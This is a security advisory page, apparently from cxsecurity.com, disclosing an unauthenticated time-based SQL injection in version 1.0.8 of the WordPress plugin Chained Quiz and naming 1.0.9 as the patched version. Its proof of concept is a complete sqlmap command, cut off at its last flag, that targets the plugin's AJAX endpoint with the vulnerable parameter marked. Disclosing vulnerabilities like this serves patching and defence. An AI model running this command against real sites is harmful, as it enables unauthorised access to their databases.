WordPress Plugin Chained Quiz 1.0.8 answer SQL Injection

2018.08.22
Credit: Çlirim Emini
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection # Exploit Author: Çlirim Emini # Website: https://www.sentry.co.com # Software Link: https://wordpress.org/plugins/chained-quiz/ # Version/s: 1.0.8 and below # Patched Version: 1.0.9 # CVE : N/A # WPVULNDB: https://wpvulndb.com/vulnerabilities/9112 # Vulnerability Description: # WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated # users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters. # Technical details: # Chained Quiz appears to be vulnerable to time-based SQL-Injection. # The issue lies on the $answer backend variable. # Privileges required: None # Proof of Concept (PoC): sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=1&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top